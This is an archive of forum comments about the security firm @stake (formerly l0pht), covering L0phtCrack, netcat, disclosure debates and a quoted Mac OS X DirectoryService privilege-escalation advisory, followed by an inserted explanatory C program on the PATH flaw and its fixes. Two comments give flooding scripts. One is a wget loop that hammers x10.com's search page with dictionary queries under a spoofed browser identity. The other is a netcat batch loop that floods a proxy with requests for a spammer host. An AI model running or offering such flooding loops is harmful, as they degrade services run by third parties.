Domain: atstake.com
Stories and comments across the archive that link to atstake.com.
Comments · 96
-
yes
I think it was around 7-8 years ago they went from "releasing cool tools" to "whoring for big consulting contracts and never, ever releasing anything cool." Have you seen their website? Microsoft's website looks more "authentic" than that crap.
-
Fixes SERIOUS Directory Services vulnerability.
According to a vulnerability report release by @Stake, this fixes a serious security hole.
http://www.atstake.com/research/advisories/2003/a041003-1.txt
Overview:
DirectoryServices is part of the MacOS X information and authentication subsystem. It is launched at startup, setuid root and installed by default. It is vulnerable to several attacks ultimately allowing a local user to obtain root privileges.
Details:
During the startup of DirectoryService, the application creates a lock file by executing the touch(1) UNIX command. It executes touch through the system() libc function. This function is inherently insecure and its use is strongly discouraged in privileged applications.
Since this call to system() does not specify a full path to the touch(1) command, it is possible for an attacker to modify the PATH environment variable to specify a directory containing her own version of the touch(1) command. In this instance, this would cause DirectoryService to execute arbitrary commands as root.
In order for an attacker to exploit this vulnerability, they must first cause DirectoryServices to terminate. This can be done by simply connecting to port 625 repeatedly using an automated program. -
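The advisory above describes a classic privileged-process mistake: a setuid-root daemon runs `system("touch ...")` by bare name, so whatever directory the inherited PATH lists first supplies the `touch` that runs as root. The following is an added example written for this page, not the @stake advisory's code and not Apple's DirectoryService source. It shows the vulnerable pattern for contrast, a small mirror of the shell's PATH lookup so the effect can be observed on constructed directories, and two fixes: resetting PATH to a fixed value, and the real fix of creating the lock file with `open(2)` so no shell and no lookup are involved. All function names and the temporary directory names are this example's own.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* The pattern the advisory describes: a setuid-root daemon shells out to
   touch(1) by bare name, so the PATH it inherited decides which binary runs
   as root (and the lock path itself is handed to a shell unquoted). Shown for
   contrast only; nothing below calls it. */
int create_lock_vulnerable(const char *lock_path) {
    char cmd[PATH_MAX + 16];
    snprintf(cmd, sizeof cmd, "touch %s", lock_path);
    return system(cmd);
}

/* Mirror of what sh does for a bare command name: walk path_env left to
   right and report the first directory holding an executable called `name`.
   Writes the full path into out; returns 0 on a hit, -1 if nothing matched. */
int resolve_in_path(const char *path_env, const char *name, char *out, size_t outlen) {
    char *copy = strdup(path_env);
    if (!copy) return -1;
    char *save = NULL;
    for (char *dir = strtok_r(copy, ":", &save); dir; dir = strtok_r(NULL, ":", &save)) {
        snprintf(out, outlen, "%s/%s", dir, name);
        if (access(out, X_OK) == 0) { free(copy); return 0; }
    }
    free(copy);
    out[0] = '\0';
    return -1;
}

/* Mitigation 1: a privileged process must not trust an inherited PATH.
   Pinning it to a fixed value before any system()/popen() call removes the
   attacker's influence over the lookup. */
void sanitize_path(void) {
    setenv("PATH", "/usr/bin:/bin", 1);
}

/* Mitigation 2, the real fix: create the lock file directly. No shell, no
   PATH lookup, and O_EXCL|O_NOFOLLOW makes creation atomic, refusing a
   pre-placed file or symlink instead of following it. Returns 0, or -1 with
   errno set (EEXIST when the lock is already held). */
int create_lock_hardened(const char *lock_path) {
    int fd = open(lock_path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0644);
    if (fd < 0) return -1;
    close(fd);
    return 0;
}

/* Demonstration helper: constructed throwaway directory (mkdtemp template in
   dir_template) containing an executable file called `name`. The file is a
   harmless two-line script and is only ever resolved, never run. */
int make_dir_with_exec(char *dir_template, const char *name) {
    if (!mkdtemp(dir_template)) return -1;
    char p[PATH_MAX];
    snprintf(p, sizeof p, "%s/%s", dir_template, name);
    int fd = open(p, O_WRONLY | O_CREAT | O_TRUNC, 0755);
    if (fd < 0) return -1;
    const char body[] = "#!/bin/sh\nexit 0\n";
    ssize_t n = write(fd, body, sizeof body - 1);
    close(fd);
    return n < 0 ? -1 : 0;
}

int main(void) {
    /* Two constructed directories: one standing in for a user-writable dir the
       attacker put first in PATH, one standing in for the system's bin dir. */
    char attacker_dir[] = "/tmp/atk.XXXXXX";
    char system_dir[]   = "/tmp/sys.XXXXXX";
    if (make_dir_with_exec(attacker_dir, "touch") || make_dir_with_exec(system_dir, "touch"))
        return 1;

    char path_env[2 * PATH_MAX], found[PATH_MAX];
    snprintf(path_env, sizeof path_env, "%s:%s", attacker_dir, system_dir);
    resolve_in_path(path_env, "touch", found, sizeof found);
    printf("inherited PATH resolves touch to: %s\n", found);   /* attacker's copy */

    snprintf(path_env, sizeof path_env, "%s", system_dir);
    resolve_in_path(path_env, "touch", found, sizeof found);
    printf("pinned PATH resolves touch to:    %s\n", found);   /* system copy */

    char lock[PATH_MAX];
    snprintf(lock, sizeof lock, "%s/DirectoryService.lock", system_dir);
    printf("hardened create: %d\n", create_lock_hardened(lock));             /* 0 */
    printf("second create:   %d (%s)\n", create_lock_hardened(lock), strerror(errno)); /* -1, EEXIST */
    return 0;
}
```

The point the test makes is the one the advisory makes: with the attacker's directory first in PATH, the bare name resolves to the attacker's file, and no amount of care elsewhere in the daemon helps. Pinning PATH closes that specific hole, but `create_lock_hardened` is the better fix because it also removes the shell (and with it any metacharacter in the path string) and closes the symlink race that a separate `touch` invocation leaves open.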
Re:What?
l0phtCrack really can do this - by exploiting weaknesses in Windows password hashing it is possible to know that you have some of the characters right without getting the whole password. This paper goes into the gory detail...
-
Read the articles before posting, please?
Blockquoth the poster:
Eweek has their typical (puffy, low on tech details) take on it here. Since they don't specify the OS, I'm assuming these are drivers for Windows.
First off, the linked eWeek article specifically states:
"The Linux, NetBSD and Microsoft Windows operating systems are known to have vulnerable link layer implementations, and it is extremely likely that other operating systems are also affected."
Not to defend eWeek's journalistic or technical integrity, but they do a pretty good job of summing up the pertinent facts... such as the vulnerability affecting the above implementations.
Secondly, This is a Hyperlink. They are sometimes used on the World Wide Web, to link relevant and useful resources together. Had you followed this particular link, you would have found the CERT advisory about the problem AND a link to @Stake's own advisory and white paper about the problem.
Thank you
-
Re:Or maybe
The report at atstake has a demonstration of vulnerability using code taken from /usr/src/linux/drivers/net/atp.c with a note "atp.c is a Linux device driver for Ethernet adapters based on the RealTek RTL8002 and RTL8012 chipsets." So looks like Linux is (or was) vulnerable. It is a shame none of Linux vendors provided their status. I am sure CERT notified them well in advance.
-
Hemos is an MS shill
That's the only explanation that makes sense. He's trying to discredit MS-bashers by providing such an excellent example of false and childish anti-MS claims. The original @Stake paper (don't blame me for the format) not only lists vulnerable Linux drivers, it seems to list only Linux drivers. Windows is mentioned exactly once, and only in a vague afterthought kind of way; the focus is on the vulnerability as it exists on Your Favorite OS.
-
Re:Or maybe
One step further: Given that Linux is GPL the flaw can be not only shown but demonstrated... given this is GPL I suppose we can expect a 2.4.21 or 22 to correct these flaws.
-
@stake Advisory
-
Details from @stake
@stake's advisory release:
http://www.atstake.com/research/advisories/2003/a010603-1.txt
And their etherleak report PDF:
http://www.atstake.com/research/advisories/2003/atstake_etherleak_report.pdf -
Re:A way to fight back?
I don't know enough about HTML/perl/etc., but there must be a way to set up a script to submit queries to the "Search this site" box that most websites have. Vary the query so it cannot be cached. Doesn't really matter if the search terms are meaningful.
/dev/random even. Just make their Win2K/IIS server farm chug away on thousands of searches for hours.
That's a very interesting idea.
Sticking with the X10 example, their search URL is http://www.x10.com/cgi-bin/search/search_index.cgi?search=QUERY so writing in your shell command line something like this would do your trick:
mercy_level=10; x10=http://www.x10.com; referer=$x10/products/products.htm; search=$x10/cgi-bin/search/search_index.cgi?search; agent='Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)'; for query in `cat /usr/share/dict/words`; do echo "*** Quering for $query:"; wget --user-agent="$agent" --cache=off --referer=$referer $search=$query --output-document=/dev/null; echo "*** Waiting ${mercy_level}s..."; sleep $mercy_level; done
(again, it's a one big-ass line)
It searches X10.com for every word in the dictionary located at /usr/share/dict/words, ignoring the results (or should I say, storing them in /dev/null?). It looks like MS Internet Explorer 5.5 under Windows 2000.
It would be easy to write without wget, to just connect with their server, send the HTTP query and drop the connection after the first line of answer header (or maybe using HEAD instead of GET?) to save the bandwidth, but the bandwidth is not an issue here (however it's still interesting: netcat (a TCP/IP Swiss Army Knife) would work great for making raw TCP connections from the shell, but if you prefer Swiss Army Chainsaw instead, then of course Perl (with Socket or IO::Socket or LWP or LWP::Simple) is the tool -- again, There's More Than One Way To Do It).
This attack, unlike the one with downloading statical content, would be directed to their database CPU/RAM/IO resources.
Actually, why use wget (or anything else for that matter)? Here's a cooler idea: Run nc -lp 1234 and point your browser to http://localhost:1234/ to see what your real HTTP queries look like. E.g. for my Mozilla it's:
GET / HTTP/1.1
Host: localhost:1234
User-Agent: Mozilla/5.0 (X11; U; Linux i586; en-US; rv:1.0.0) Gecko/20020623 Debian/1.0.0-0.woody.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,text/css,*/*;q=0.1
Accept-Encoding: gzip, deflate, compress;q=0.9
Accept-Charset: ISO-8859-1, utf-8;q=0.66, *;q=0.66
Keep-Alive: 300
Connection: keep-alive
Now, we can just change Host to www.x10.com and "GET /" to "GET /cgi-bin/search/search_index.cgi?search=QUERY" (and maybe add Referer header) and we have our HTTP query string; after echo $http_query_string | nc www.x10.com 80 we have a response, looking exactly like a real browser (with JavaScript and downloading pictures turned off).
Of course, don't do that, unless you think it is OK... I take no responsibility for anything anyone could do with anything at all.
-
Re:A way to fight back?
Get NetCat for Win32
spam.cmd:
echo GET http://spammer.host.tld/ HTTP/1.0>spam.txt
echo Host: spammer.host.tld>>spam.txt
echo User-Agent: SPAMMER/1.0 (die; faggots)>>spam.txt
echo Pragma: no-cache>>spam.txt
echo.>>spam.txt
:begin
nc cache.isp.tld 3128<spam.txt>nul
goto begin -
Re:NTLM auth
NTLM is a bug. If you do not think so, I suggest you use L0phtCrack.
-
Re:g4u source code mirror
he's talking about netcat, the general purpose network swiss army knife.
you should install it, it's probably one of the most useful network utilities ever written. -
In Canada - Maybe the same elsewhere
Several of the "security agencies" in Canada offer courses which are fairly strong overviews. The RCMP technical security branch offers a number of workshops for free. I have taken the 4 day IT security officer and 1 day malicious code course and both were very good overviews.
The Communications Security Establishment (Canada's NSA) offers a number of courses quite cheap. This is a good place to start and often provides a wealth of resources for additional learning. I would look into whether the same exist in your country...
SANS reading room boasts 1300 research papers. Here are some other places for reading off the top of my head:
@Stake
phrack
antionline
securityfocus
There are tons more if you look
Sig, Shmig...who needs one -
What I can think of right now:
- Tcpflow - read contents of tcp traffic in real time. Great for watching browser/webserver interactions.
- Netcat - connect Unix pipes to TCP sockets. Should have been part of Unix since the advent of TCP/IP. Great for rigging a temporary "server" to see if a client is connecting as advertised: nc -lp 80.
- X Resources (as seen in ~/.Xdefaults) - you can make xterms really dark, even when running colored apps like mutt, with dark Xresources like: XTerm*color9: #690000 - man xterm for meanings of color0-15.
xrdb -merge .darkXres to use.
- Xmessage - useful in crontabs to remind you of periodic things - like remembering to go home. With the right params, it can take over the whole screen, which is hard to ignore.
- perl -pi.bak -e's/chocolate/vanilla/g' *.recipe - change a bunch of files, leaving backups.
-
As a Security Admin all I can say is.....Duh!
People at work hate me for enforcing hard passwords. (And other assorted security measures)
Basically I am a BOFH so I don't care.
Unfortunately the common joe/jill user has no clue when it comes to computer security.
You just have to resign yourself to the fact that people are not going to like you. (i.e. Security Nazi)
A good way to help *push* them towards secure passwords is to crack your own systems passwords.
You can use John the Ripper for Unix passwords OR l0pht crack for Windows systems.
Nothing disturbs an end user more than when you email them their old password,
(You have changed it to something hideous now...) and warn them that you can read their email.
If you use Microsoft systems then use the password "Account Policies" options to increase password length/complexity values.
If you use Unix try npasswd to enforce difficult passwords.
The most important factor is to get Management buy-in. Try cracking some VP's passwords during a "standard audit".
Help them come up with a creative password. (First letters of a phrase work well. Throw in some numbers/metachars..)
Once I had Management buy-in it was smooth sailing. Just hold their hand for a while.
-
Re:Don't lose telnet.
I always use Netcat or one of its variants (such as OpenBSD's obnc or cryptcat, say) to do that sort of thing, and a number of other little weirdnesses besides. Certainly it isn't as smart as telnet, but it does the jobs I need it to and more besides.
-
Start from the beginning
First off, the reason your security is broken is that you probably don't have a policy and if you do nobody understands it and if they do there's no QA ensuring that they follow it.
Good security starts with the establishment of a security policy followed by education and regular awareness events. Please be aware that paying someone a ton of money to pen. test and inventory your assets will *not* result in a stronger security posture all on its own. You must have a policy in place and you must compel your users to abide by it (primarily through education, secondarily through threat of penalty). Consider hiring a CISSP or other certified professional to help you through this process. You might be able to find one in your area by using the ISC2 directory. SANS is doing some ISO certification as part of the GIAC program now and they may be able to point you towards some appropriate people as well. The ISSA might be able to help as well. As has been mentioned already, you probably don't want to entrust this to someone selling countermeasures or management services.
Understand, however, that you don't need a firewall engineer right now and you don't need some krad ex-hacker to pen test either. You need someone to help you get your house in order on the administrative side and then you can look into some detailed engineering and assessment. That someone should probably be an independent consultant or at least one working with an infosec specializing firm. If you want a couple bigger names there's @Stake, Booz Allen Hamilton, and Predictive, however, I would encourage you to seek out a local independent with good references.
Any knucklehead can run Nessus and patch systems. This alone does not equal information security. If you want a secure environment, start by defining what "secure" means within your environment. -
It's not a joke - they actually have such a group
The Cult of the Dead Cow spun off L0pht Heavy Industries, a security consultancy, which then changed its name to @Stake. @Stake is well-respected, and produces good papers on the theory and practice of security holes. But then, so did CdC.
-
Re:Advantages of Mandrake?
Netcat is a great tool for that. A "network swiss army knife" if you will.
-
That vulnerability is purely theoretical...
The still-excellent l0pht once informed the world that Microsoft had a serious security problem in a product. MS responded with the famous "That vulnerability is purely theoretical.". So, l0pht released a real exploit for the vulnerability.
Apologies, it's hard to find the original links since l0pht got up in the morning, put on a suit, and became @stake
Hello. Wake up. Theoretical vulnerabilities become real, nasty, exploited vulnerabilities very fast. I assume you read comp.risks?
Looks like it isn't very likely to succeed
LOOKS LIKE? It's a done deal. Somebody has exploited a widely-distributed scripting engine. The people who did it as a "proof-of-concept" have proven that the interpreter for this language is wide-open and gagging for a jolly good rogering. I wonder how many unchecked buffers there are in that code. I wonder how it handles multi-byte characters. I desperately hope it wasn't written in C.
I sit here as a smug old Unix hacker, secure in the knowledge that lisp and Smalltalk programs are unlikely to be attacked in the same way that C programs are.
I'm also sure I'm wrong. -
Security and Hacking
I guarantee this hacking school will attract a lot of genuine soon-to-be kiddies and nothing but negative exposure for the school itself. As everyone here is saying, they seem to be teaching more of a cracking style than hacking or security. I would seek out a more reputable source of education if I wanted to learn more than "the fine art of breaking into systems". Security education at @stake just doesn't compare to the quality you get at Xintra. You're not going to go to fast-food for gourmet.
-
The Poor Misguided l0pht
It is quite sad to see that the former l0pht (hopefully you remember them), who went corporate and melted into @stake, have joined the "coalition against full disclosure of computer vulnerability information". I'm amazed that Mudge and Weld Pond would turn full circle and endorse this sort of thing. The l0pht were the sort of people who stood for full disclosure. Too bad they have made this decision. I have lost my respect for them.
At least eEye are keeping their heads about them. -
Bug Non-disclosure
Hey,
Bindview, Foundstone, Guardent, @Stake, and Internet Security Systems joined with the software-maker to declare they would immediately begin
Wasn't @stake formed from hacker group l0pht? Yes, I think they were! They used to attend Def Con, and work on Back Orifice and L0phtCrack?? Didn't they get banned from BugTraq because they posted links to their site in the place of good, solid descriptions?
My, how times change.
-M -
Re:microsoft :P
one link... Here l0phtcrack. Cracking windows passwords for years.
-
I Have More than Just 1 Problem With this Article
"There is some value for having details in the advisories, but not exploit code. " said Chris Wysopal, director of research and development for security firm @Stake,
Once you have the details of what's vulnerable you're less than an hour away from an exploit, even if you're a VB programmer. The message that needs to get out to Culp and others looking to sweep their flaws under the carpet is that once the flaw is published, the exploit is on its way! Putting the exploit out there forces unwary admins to patch before they get hit. And, if they don't stay on top of security for their system and they get owned; fine. Find a different admin.
The other thing that bothers me about the article is the uncharacteristically congenial tone Wysopal took WRT M$. Weren't the guys who formed @Stake the same ones slinging shit at them back before they founded @Stake? (Inclusion of an example with an exploit purely intentional.) Takes my opinion of them down a notch. -
Re:what about bugtraq?
I don't know much about how this bill would be interpreted were it to come to law, but it seems to me that making security bugs known to the general public could be construed as giving advice to a hacker since, well, it alerts the general public to security problems.
Security sites often post code that can be used to exploit a particular hole, so that the hole can be better understood and more easily patched.
What about tools like L0phtcrack? -
The importance of knowing the subject matter
The biggest thing is that if you aren't an excellent sysadmin yourself, find a neutral but qualified consultant to help with the interviewing process!
I'm reminded of the time that Mudge from the l0pht (now @stake) told the story of how he did this for a company seeking a security professional, and the interviewee proceeded to tell Mudge how the interviewee wrote L0phtcrack! (For those who don't know it, it is Mudge who wrote L0phtcrack.) Mudge went on to quite sarcastically tell the Manager he was consulting for: "L0phtcrack is a great program. You should hire him!"
Needless to say, the Manager was quite happy he followed the aforementioned advice! -
I've done this before...
On my network. I found it quite humorous that one of the heads of the company's password was "womanizer". For you network admins on NT networks, all you've got to do is use the handy dandy L0phtcrack and dump them from your PDC. I guess NT is good for something (password auditing surveys)
Jason -
"Microsoft EULA stokes crusade"
Again?
All this hostility towards open source software...you'd almost think they weren't hosting HotMail's DNS with FreeBSD. Almost.
-Legion
-
Re:Impending Name Change
Now that they are no longer "in the red", so to speak, I wonder if they will change their name to "BlackHat", and become a security consulting firm.
i think you're looking for the l0pht.. i mean, @stake
:)
----- -
Zimmermann leaves NAI, PGP 7.x.x closed source
Well I just created my 1st Slashdot user account, because I hope this post will get read and moderated up.
Phil Zimmermann has left Network Associates, citing "philosophical differences", and NAI PGP has just become closed source software. PGP without source is not PGP. Slashdot readers know why. Please avoid Network Associates PGP version 7.x.x, and spread the word.
Cyber Knights Templar PGP 6.5.8 is open source PGP for Windows users, and includes a security patch for a very nasty remote exploit against "official" NAI PGP 6.5.8., the ascii armor parsing bug.
GPG is the wave of the future, but in the present, user friendly Windows support for strong crypto is still important. This support is provided by the Cyber Knights Templar builds, which also include the AES cipher (Rijndael 256) and large key support.
Please publicise this address, where Win32 binaries and full source code are posted for download:
There is no charge for CKT PGP, and BTW, I am not affiliated in any way with the CKT folks.
99 buckets of bits on the wall... -
Re:ibutton
Using things like iButton does not get around the issue here. All you have done is slightly shift the nature and physical whereabouts of the device which contains the private key/shared secret/magic word that opens the castle gates.
Don't consider it that way? Examine this: http://www.atstake.com/research/advisories/2001/index_q1.html#011801-1
The bottom line is what it always has been: security is a matter of depth and cannot possibly be judged by the technical merits of any one component. Like a chain, the weakest link defines the strength of the entire system. -
Why is riaa.com still intact?
With the large number of blackhats likely to be in the population of those pissed-off about the way things have been going, I'm surprised that the RIAA and its major members still have intact web presence. Not that I'm advocating or condoning civil disobedience as a means of political action. Oh, and I'm also surprised to see that the MPAA site is up.
-
Protection and History
I was unable to find any information on DataPlay's site regarding the 1-bit copy protection scheme, but if that's all they're using to protect that content, then I think Kingpin of the infamous L0pht industries (now @stake) might have something to say... Over two years ago, he created a simple tool to reset the 'beam bit' in a Palm app, effectively short-circuiting Palm's own protection scheme. If DataPlay's security is anything similar, then they're in for a real treat.
On another note, check this clip from DataPlay's Company FAQ:
DataPlay's visionary team brings the company over 1,000 years of cumulative experience in optical, electrical and mechanical engineering technologies, the Internet and content distribution.
One thousand years of management experience? Either everyone there has 'Manager' written into their titles (don't laugh, I've seen it done), or they're harnessing Charlemagne as their CEO. -
My own horn
This will come off as a bit biased (which it is), but I work for a company that has written some software called Hailstorm that's very good at helping you test your own security. It's especially good in situations where you have written something custom, whether it be a CGI script or some sort of server program. It succeeds where security scanners fail, because it can help you find problems that are previously unknown. To see it in action analyzing IDS systems, check out the article at SecurityFocus. Good security consulting firms are VERY expensive, so Hailstorm may be a good choice depending on what you are really looking for.
If you want to hire a security firm, I would suggest a few different companies: Securify, a division of Kroll-O'Gara; Guardent; Ernst & Young; @Stake; and Foundstone.
Also, if you are interested in trying out Hailstorm (which, for the time being, only runs on NT 4.0/W2K, although it can test applications on any OS), shoot me an email (removing the obvious part), and I'll help you out. A trial version can be downloaded at www.ClickToSecure.com. -
radio
Should the full-court press by the censorship powers-that-be continue, the next step might be radio-based packet systems. Feel free to pile in on the technical/political feasibility/shortcomings of such a system, but...
The guys over at L0pht (which I didn't see at the MIT Flea yesterday...) were working on such a system. I wonder if it's mothballed due to their newfound partnership with @Stake. Hm.
My .02
Quux26 -
Re:In a word, credibility...
Pity about the @Stake web site - they seem to have had the "web is art" or "my browser is the only browser" designers in (or perhaps the black on black I got is an 'underground' thing).
So, who owns http://www.@stake.com? Or is likely to be 0wn3d later? -
Re:In a word, credibility...
Having people who can speak "suit language" working as consultants with people who understand security technology looks like an important step to getting security taken seriously. For too long, security has been the "top priority" until it comes time to pay in [money,time to market,performance,usability] when the acceptable price turns out to be [some,nothing,nothing,nothing].
Let us hope that this company has the credibility, both business and technical, to make decision makers realise that it is possible to do better than is common with current offerings.
Pity about the @Stake web site - they seem to have had the "web is art" or "my browser is the only browser" designers in (or perhaps the black on black I got is an 'underground' thing).